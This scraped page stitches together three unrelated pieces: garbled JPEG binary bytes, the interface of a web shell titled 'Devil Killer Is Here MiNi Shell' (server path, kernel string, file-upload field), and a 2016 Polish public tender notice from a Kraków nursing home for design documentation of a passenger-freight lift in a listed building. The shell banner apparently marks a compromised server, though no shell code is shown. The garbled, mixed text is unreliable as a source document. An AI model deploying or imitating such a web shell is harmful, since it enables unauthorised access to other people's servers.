JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160523/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160523/57039-N-2016.html

<p class="kh_header"><b>Kraków: Opracowanie dokumentacji projektowej dźwigu osobowo-towarowego</b><br>
<b>Numer ogłoszenia: 57039 - 2016; data zamieszczenia: 23.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej im. L. A. Helclów , ul. Helclów 2, 31-148 Kraków, woj. małopolskie, tel. 012 6330828, faks 012 6343151.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpshelclow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej dźwigu osobowo-towarowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowej dźwigu osobowego-towarowego oraz uzyskanie wymaganych pozwoleń i uzgodnień do wybudowania dźwigu osobowego-towarowego zewnętrznego oraz uzgodnienie z Wojewódzkim Konserwatorem Zabytków dobudowy dodatkowego dźwigu osobowego i przebudowy istniejącego dźwigu w budynku Domu Pomocy Społecznej im. L. A. Helclów w Krakowie przy ul. Helclów 2. 
Szczegółowe warunki i zakres zamówienia określono we wzorze umowy stanowiącej Załącznik nr 2 do niniejszej specyfikacji istotnych warunków zamówienia.
Obszar budowy pod ochroną konserwatorską. 
Budynek wpisany jest do rejestru zabytków Krakowa Decyzją Prezydium Rady Narodowej w mieście Krakowie, Wydział Kultury z dnia 17 maja 1968 roku.
Budynek znajduje się w strefie objętej ochroną Wojewódzkiego Konserwatora Zabytków i został wpisany do rejestru zabytków pod nr .rej. 114. 
1. Przedmiotem zamówienia jest:
1)	złożenie wniosku o wydanie decyzji ULICP dla zamierzenia polegającego na budowie dwóch wind zewnętrznych,
2)	opracowanie kompletnej dokumentacji projektowo - wykonawczej oraz złożenie wniosku w sprawie wydania decyzji o pozwoleniu na budowę dla przeprowadzenia prac w zakresie budowy zewnętrznego dźwigu towarowo-osobowego dla osób niepełnosprawnych do budynku przy ul. Helclów 2. Winda ma zostać dobudowana do przewiązki łączącej obiekt zabytkowy A do budynku B. Zarówno przewiązka jak i budynek B powstały pod koniec lat 90 i nie są wpisane do rejestru zabytków lecz mieszczą się na terenie wpisanym do rejestru zabytków , nieruchomość oznaczona jako działka o nr ewid. 116/14 - wykaz zabytków nr A-114. Inwestycja zlokalizowana będzie na terenie będącym w zarządzie trwałym Domu Pomocy Społecznej przy ul. Helclów 2 w Krakowie. Projektant ma obowiązek ująć w dokumentacji projektowej wszystkie istotne elementy, które są niezbędne dla prawidłowego wykonania robót budowlanych w oparciu o złożoną dokumentację projektową i zgodnie z obowiązującymi przepisami, w tym w szczególności wykonawca ma uwzględnić konieczność przełożenia instalacji wewnętrznych i zewnętrznych kolidujących z windą i dodatkowymi wejściami do budynku. Zamawiający przewiduje, że winda i wejścia do budynku z windy będą kolidowały z zewnętrzną, podziemną instalacją elektryczną oraz instalacjami wewnętrznymi: c.o. Zamawiający zastrzega, że Wykonawca ma obowiązek zaprojektowania przebudowy również innych instalacji jeżeli będą one kolidować z dźwigiem osobowo-towarowym lub wejściem do niego. Dźwig osobowo-towarowy ma zapewnić dostęp do budynku z powierzchni terenu na pater i do przyziemia (trzyprzystankowy). Wykonawca ma w miarę możliwości zaprojektować dźwig osobowy, który będzie również służył do dostawy żywności do kuchni z uwzględnieniem zachowania odpowiednich, nie krzyżujących się dróg dostaw. Zamawiający udostępni wykonawcy projekt budowlany, na podstawie którego powstał obiekt, do którego ma zostać dobudowany dźwig towarowo-osobowy dla osób niepełnosprawnych. Powierzchnia przełączki użytkowa 206.0 m2, kubatura przełączki 950 m3, powierzchnia budynku B użytkowa1907.0 m2, kubatura budynku B 11 950 m3.
a)	Uwaga :
Jeżeli nie będzie możliwości dostarczania artykułów spożywczych do kuchni z uwagi na obowiązujące przepisy sanitarno-epidemiologiczne lub nie będzie możliwości łączenia funkcji w dźwigu - towarowym i dla osób niepełnosprawnych - należy zaprojektować dźwig osobowy dwuprzystankowy z poziomu terenu do poziomu parteru.
b)	Projektowany dźwig powinien zostać zaprojektowany, 
a w następstwie zrealizowane przy użyciu takich technologii i środków technicznych, aby do minimum ograniczyć niekorzystne oddziaływanie inwestycji na środowisko. Użyte w projekcie materiały budowlane, instalacyjne i wykończeniowe oraz technologie muszą zapewnić niskie koszty eksploatacji i utrzymania przy zapewnieniu wymaganego przez Zamawiającego standardu wykończenia i użytkowania. 
Przedmiot inwestycji należy zaprojektować i zrealizować zgodnie 
z wymaganiami obowiązujących norm i przepisów. W szczególności projektowane rozwiązania i elementy budowlano - instalacyjne towarzyszące muszą spełniać warunki ochrony przeciwpożarowej, bezpieczeństwa konstrukcji i użytkowania, ochrony środowiska, wymagań sanitarno - higienicznych i ochrony zdrowia, przepisów bezpieczeństwa i higieny pracy oraz pokrewnych.
c)	Zamawiający zastrzega, że lokalizacja windy nie może pogorszyć szczelności izolacji na styku szybu windy i konstrukcji budynku. Zamawiający sugeruje zaprojektowanie nie tylko posadowienia szybu do styku konstrukcji a także dodatkowego drenażu na długości ściany z lokalizacją windy gdyby mogło doprowadzić do pogorszenia szczelności.
d)	Winda dla osób niepełnosprawnych będzie poruszać się w pionie na wysokość poziomu górnej kondygnacji około 1,9 m od poziomu gruntu a następnie do piwnicy.
e)	Ilość przystanków 3.
f)	Wejścia do windy:
- poziom terenu: ? 0,00 m
- parter: około +1,9 m
- piwnica:  około - 1,35 m
g)	Projekt ma uwzględniać bezkolizyjny dojazd osobom niepełnosprawnym z istniejącego układu komunikacyjnego do windy.
h)	Winda musi przejść pozytywnie badania odbiorcze przeprowadzone przez Urząd Dozoru Technicznego a także spełniać wszystkie wymogi użytkowe i eksploatacyjne obiektu.
i)	Elementy zewnętrzne windy winny odpowiadać wymogom bezpieczeństwa. Forma i architektura szybu windy ma być uzgodniona z właściwymi służbami Wojewódzkiego Konserwatora Zabytków.
j)	Wszelkie roboty adaptacyjne montażu windy winny być zaprojektowane i wykonane bez uszczerbku dla konstrukcji istniejącego budynku z wyłączeniem dodatkowych wejść z windy.
k)	Wytyczne dotyczące instalacji :
- Program nie przewiduje znacznej ingerencji w istniejące instalacje,
- Demontażowi podlega zestaw grzejników c.o. w pionie przewidzianym na montaż szybu dźwigowego,
- Zasilanie windy należy przewidzieć w oparciu o istniejącą instalację elektryczną jako niezależny obwód. Należy przewidzieć wykonanie uziemienia dla windy.
l)	Wytyczne dotyczące wykończenia :
- Elewacje budynku należy naprawić w obrębie montażu szybu nawiązując do istniejącego rozwiązania,
- Otwory drzwiowe oraz okienne przystosowane na dostęp do/z kabiny windy należy wykonać zgodnie ze sztuką budowlaną i wymogami przepisów w tym względzie.

3) Złożenie koncepcji do Wojewódzkiego Konserwatora Zabytków w zakresie dobudowy w celu uzyskania opinii wskazującej na możliwość dobudowy zewnętrznego dźwigu osobowego dla osób niepełnosprawnych dwuprzystankowego z poziomu terenu na parter budynku lub przebudowy istniejącej windy wewnętrznej poprzez dodanie dodatkowego przystanku na poziomie terenu (aktualnie najniższy poziom przystanku dźwigu osobowego to poziom piwnicy) z wykonaniem wejścia z zewnątrz. Zarówno dodatkowy dźwig, jak też dodatkowe wejście do budynku do przebudowanej istniejącej windy dotyczą budynku A wpisanego do rejestru zabytków. 
Zamawiający udostępni posiadaną dokumentację projektową budynku. 
Orientacyjna powierzchnia budynku A 16 000 m2, orientacyjna powierzchnia budynku B 1851 m2.

2. Dokumentacja projektowa, o której mowa w rozdziale I pkt 1 ppkt 2 obejmuje w szczególności :
1)	 Dokumentację przedprojektową, w tym : 
mapę do celów projektowych, ekspertyzę geotechniczną,  ekspertyzę konstrukcyjną   określającą możliwość dobudowy szybu windowego,
2)	 Projekt budowlany  wraz z niezbędnymi uzgodnieniami umożliwiającymi uzyskanie decyzji o pozwoleniu na budowę lub/oraz dokonanie zgłoszenia zamiaru wykonania robót budowlanych, w zakresie w jakim będzie ono wymagane.

Projekt budowlany ma być sporządzony zgodnie z wymaganiami określonymi w Rozporządzeniu  Ministra Transportu, Budownictwa  i  Gospodarki Morskiej w sprawie szczegółowego zakresu i formy projektu budowlanego z dnia 25 kwietnia 2012 r. (Dz.U. z 2012 r. poz. 462) oraz ma zawierać informację dotycząca bezpieczeństwa i ochrony zdrowia (BIOZ).
3)	 Projekty wykonawcze, uzupełniające i uszczegółowiające projekt budowlany w zakresie i stopniu niezbędnym do przygotowania oferty przez wykonawcę robót budowlanych oraz przeprowadzenie tych robót, w tym projekty branżowe.
Projekt wykonawczy ma uszczegóławiać dokumentację projektową w sposób pozwalający na bezproblemowe wykonywanie robót budowlanych i nie pozostawiający wątpliwości co do zakresu robót budowlanych oraz ma zawierać informację dotycząca bezpieczeństwa i ochrony zdrowia (BIOZ).
Do projektu Wykonawca załączy wykaz wszystkich  materiałów, urządzeń i wyposażenia, które mają być użyte do realizacji robót budowlanych prowadzonych w oparciu o projekt budowlany oraz w które maja być wyposażone lokale/budynki i które maja wpływ na jakość, trwałość, estetykę, ergonomię lub jest konieczne z uwagi na specyfikę prac(obiektu) sposobu użytkowania. 
W wykazie tym należy podać markę i model urządzenia/materiału/wyposażenia oraz istotne parametry tych urządzeń/materiałów/wyposażenia z punktu widzenia ww. czynników (np. wymiary, wytrzymałość, klasę ścieralności, grubość itp.). Ponadto w zestawieniu mają bezwzględnie znaleźć się wszystkie materiały, urządzenia i sprzęty wymienione w dokumentacji projektowej, w tym kosztorysach i przedmiarach oraz specyfikacji technicznej wykonania i odbioru robót. Dodatkowo, Wykonawca zobowiązany jest podać w wykazie kolorystykę materiałów/sprzętów/urządzeń.
Projekt wykonawczy obejmuje również projekt robót ziemnych, w który wykonawca uściśli na podstawie ekspertyzy geotechnicznej warunki prowadzenia robót ziemnych, w tym zabezpieczenie skarp i fundamentów istniejącego budynku, odwodnienie dna wykopu.

4)	 Specyfikację techniczną wykonania i odbioru robót budowlanych, zawierająca szczegółowy opis wymagań niezbędnych do określenia:
- standardu, sposobu i jakości wykonania robót,
- standardu, jakości i właściwości użytych materiałów ,
- sposobu odbioru robót i wymogów Zamawiającego przy odbiorze.

Specyfikacja techniczna ma uwzględniać wymagania wynikające z Rozporządzeniem Ministra Infrastruktury z dnia 02 wrześnie 2004 w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego, w szczególności w zakresie wskazanym w par.13 i 14 (Dz. U. 2013 poz. 1129).  
5)	 Przedmiary robót zawierające zestawienie przewidywanych do wykonania robót w kolejności technologicznej ich wykonania, wraz z ich szczegółowym opisem, miejscem wykonania, lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem i zestawieniem ilości jednostek miar robót podstawowych oraz wskazaniem podstaw do ustalenia cen jednostkowych robót lub jednostkowych nakładów rzeczowych,

Przedmiar robót ma uwzględnić wymagania wynikające z Rozporządzeniem Ministra Infrastruktury z dnia 02 września 2004 w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego, w szczególności w zakresie podanym w par. 6 do 10 (Dz. U. Nr 202 z dnia 16 września 2004 r., poz. 2027).

6)	 Kosztorysy inwestorskie, opracowane na podstawie przedmiarów, o których mowa w pkt. 5.
Kosztorysy mają być opracowane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. Nr 130, poz. 1389 z 2004 r.).
7)	 Opracowanie dokumentacji powykonawczej niezbędnej do uzyskania niezbędnych pozwoleń na użytkowanie dobudowanej infrastruktury.
 Uwaga:
1)	wszystkie elementy dokumentacji projektowej mają w sposób szczegółowy opisywać wymogi dotyczące użytych materiałów, bez naruszenia przepisów ustawy Prawo zamówień publicznych, w szczególności w zakresie podawania marek i nazw własnych oraz zapobiec zastosowaniu materiałów  niskiej jakości. Opis  materiałów nie może ograniczać konkurencji w rozumieniu ustawy Prawo zamówień publicznych, a w szczególności nie może jednoznacznie wskazywać na zastosowanie materiałów konkretnego dostawcy/producenta,
2)	w razie konieczności Wykonawca zobowiązany jest opracować dodatkowe materiały jeżeli będzie tego wymagało osiągnięcie efektu jakim jest dobudowa dźwigu zewnętrznego, w tym w przypadku konieczności uzyskania uzgodnień z rzeczoznawcami z zakresu ochrony pożarowej oraz warunków sanitarnych - uwzględnienia w dokumentacji wprowadzenia w budynkach zmian niezbędnych dla uzyskania akceptacji dokumentacji projektowej przez ww. rzeczoznawców,
3)	dokumentacja ma być kompletna z punktu widzenia celu jakiemu ma służyć oraz być zgodna m.in. z :
a)	ustawą z dnia 7 lipca 1994 r. Prawo Budowlane wraz z przepisami wykonawczymi,
b)	Rozporządzeniem Ministra Infrastruktury w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie ( DZ. U. 2015 poz. 1422)
c)	Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. ( DZ. U. z 2004 , Nr 130 poz. 1389)  w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym,
d)	Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 7 czerwca 2010r. (DZ.U. z 2010r. Nr 109, poz. 719)  w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów,
e)	Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 24 lipca 2009 r. (DZ. U. z 2009r, Nr 124, poz. 1030) w sprawie przeciwpożarowego zaopatrzenia w wodę oraz dróg pożarowych,
f)	Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 02 grudnia  2015r. ( tj. Dz. U. z 2015r. poz. 2117) w sprawie uzgodnienia projektu budowlanego pod względem ochrony przeciwpożarowej,
g)	wszystkimi innymi unormowaniami, zasadami, standardami i przepisami prawnymi których należy przestrzegać przy realizacji tego typu inwestycji,
4)	w razie potrzeby, wykonawca zobowiązany jest wykonać niezbędne odkrywki jeżeli będzie to konieczne dla należytego przygotowania dokumentacji projektowej,
5)	dokumentacja wykonawcza (projekty wykonawcze, w tym branżowe, specyfikacje techniczne wykonania i odbioru robót, kosztorysy inwestorskie i przedmiary) zostanie dostarczona Zamawiającemu w 5 jednobrzmiących egzemplarzach, w formie papierowej oraz w wersji elektronicznej (na płycie CD - 3 szt.), Wersja elektroniczna zostanie przygotowana zarówno w formie: do odczytu - pliki .pdf  oraz w formie do edycji - pliki MS Office oraz .dwg
6)	projekt budowlany ma być dostarczony w 2 egzemplarzach wraz z pozwoleniem na budowę lub zaświadczeniem o niewniesieniu sprzeciwu zgłoszenia zamiaru wykonania robót budowlanych, w zakresie w jakim jest ono wymagane.

3. Wymagane uzgodnienia:
Wykonawca złoży wniosek i uzyska decyzję o ULICP i pozwoleniu na budowę. W zakres tego etapu wykonania przedmiotu zamówienia wchodzi również uzyskanie wszelkich uzgodnień, opinii niezbędnych do uzyskania pozwolenia na budowę lub dokonania zgłoszenia zamiaru wykonania robót budowlanych, w tym również:
a)	uzgodnienie dokumentacji projektowej przez rzeczoznawców branżowych, w tym sanitarnego-higienicznego oraz ds. zabezpieczeń przeciwpożarowych oraz właściwą jednostkę Państwowej Straży Pożarnej oraz stacji epidemiologiczno-sanitarnych o ile z uwagi na zakres robót będzie wymagał uzgodnienia,
b)	uzyskanie pozwolenia właściwego konserwatora zabytków dla budowy zewnętrznego dźwigu towarowo-osobowego w przybudówce pomiędzy budynkami A i B oraz uzyskanie opinii właściwego konserwatora zabytków dla budowy dźwigu osobowego i przebudowy istniejącego wewnętrznego dźwigu osobowego w budynku A.
Uwaga: 
1)	w razie konieczności Wykonawca zobowiązany jest uzyskać inne pozwolenia i uzgodnienia jeżeli będzie tego wymagało osiągnięcie efektu jakim jest dobudowa dźwigu towarowo-osobowego.
2)	Wykonawca zobowiązany jest reagować na wezwania do usunięcia braków we wszystkich złożonych przez siebie dokumentach w terminach wskazanych w tych wezwaniach. Jeżeli wezwanie dotyczy dokumentów otrzymanych od zamawiającego Wykonawca zobowiązany jest odebrać od zamawiającego poprawne dokumenty, ale nie odpowiada za opóźnienie w przypadku gdy zamawiający dopuścił się opóźnienia i nie przygotował tych dokumentów w odpowiednim czasie, tj. najpóźniej w dniu wyznaczonym na uzupełnienie braków.
3)	Wszelkich niezbędnych uzgodnień dokonuje Wykonawca.
4)	Wykonawca ma obowiązek uzyskać akceptację przyjętych rozwiązań przez Zamawiającego, złożeniem wniosku o wydanie pozwolenia na budowę oraz przed dokonaniem zgłoszenia zamiaru wykonania robót budowlanych.

4.	Sprawowanie nadzoru autorskiego nad realizacją robót wykonywanych wg dokumentacji wchodzącej w skład przedmiotu zamówienia.

1)	Wykonawca zobowiązany jest do pełnienia nadzoru autorskiego nad realizacją robót prowadzoną na podstawie opracowanej dokumentacji projektowo - wykonawczej, zgodnie z aktualnymi przepisami prawa, obowiązującymi normami i standardami w zakresie sprawowania nadzoru autorskiego.  
2)	Szczegółowy zakres nadzoru  określono we wzorze umowy stanowiącej Załącznik nr 2 do niniejszej specyfikacji istotnych warunków zamówienia.
3)	Na etapie składania ofert na roboty budowlane, które będą prowadzone w oparciu o dokumentację projektową sporządzoną przez Wykonawcę, Wykonawca:
a)	zaopiniuje zaproponowane zamienniki materiałów/urządzeń/sprzętów pod kątem ich zgodności z parametrami określonymi w dokumentacji projektowej. 
W tym celu otrzyma od zamawiającego wykaz materiałów/urządzeń/sprzętów załączony do oferty na wykonanie robót budowlanych wraz z dokumentami potwierdzającymi parametry tych materiałów/urządzeń/sprzętów. Wykonawca ma obowiązek uzasadnić brak akceptacji zaoferowanych przez wykonawcę robót budowlanych materiałów/urządzeń/sprzętów,
b)	Wykonawca zobowiązany jest wyjaśniać wątpliwości wykonawców robót budowlanych.
Wykonawca powinien posiadać własny egzemplarz dokumentacji projektowej do  sprawowania nadzoru autorskiego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy p.z.p.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.10.00-3, 79.71.40.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek o którym mowa w art. 22 ust. 1 pkt 1 zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie na zał. nr 1 do SIWZ -  oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek o którym mowa w art. 22 ust. 1 pkt 2 zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie na zał. nr 1 do SIWZ -  oświadczenie o spełnieniu warunków udziału w postępowaniu oraz na zał. Nr 4  do niniejszej SIWZ, tj. 
Dokumenty potwierdzające, że Wykonawca należycie wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie : 
a) wykonał co najmniej 1 (jeden) projekt zewnętrznego dźwigu towarowego lub osobowego dobudowanego do budynku, wpisanego do rejestru zabytków lub położonego na obszarze objętym ochroną Konserwatora Zabytków.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek o którym mowa w art. 22 ust. 1 pkt 3 zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie na zał. nr 1 do SIWZ-  oświadczenie o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek o którym mowa w art. 22 ust. 1 pkt 3 zostanie uznany za spełniony, jeżeli Wykonawca złoży oświadczenie na zał. nr 1 do SIWZ-  oświadczenie o spełnieniu warunków udziału w postępowaniu 
oraz na zał. Nr 3  do niniejszej SIWZ, tj.

Dokumenty potwierdzające, że Wykonawca dysponuje albo będzie dysponował osobami zdolnymi do wykonania przedmiotu zamówienia, tj. osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadają uprawnienia budowlane do projektowania bez ograniczeń w specjalności :  

1. W zakresie branży konstrukcyjno-budowlanej:
1) wymagane są uprawnienia budowlane do projektowania bez ograniczeń  w secjalności konstrukcyjno-budowlanej 

2. W zakresie branży instalacyjnej (wentylacja, instalacje, c.o., wod-kan., gazowa):
1) wymagane są  uprawnienia budowlane osoby, która posiada uprawnienia budowlane do projektowania bez ograniczeń - w specjalności instalacyjnej w zakresie : 
sieci; instalacji i urządzeń cieplnych;  wentylacyjnych; gazowych; wod - kan ; 

3. W zakresie branży instalacyjnej - instalacje elektryczne:
1) wymagane są  uprawnienia budowlane osoby, która posiada uprawnienia budowlane do projektowania bez ograniczeń - w specjalności instalacyjnej w zakresie: 
sieci; instalacji urządzeń elektrycznych i elektroenergetycznych;  

4.  W zakresie architektonicznym:
1) wymagane są  uprawnienia budowlane osoby, która posiada uprawnienia budowlane do projektowania bez ograniczeń - w specjalności architektonicznej; 
 
5. Wszystkie osoby muszą być członkami właściwej Izby Inżynierów Budownictwa.
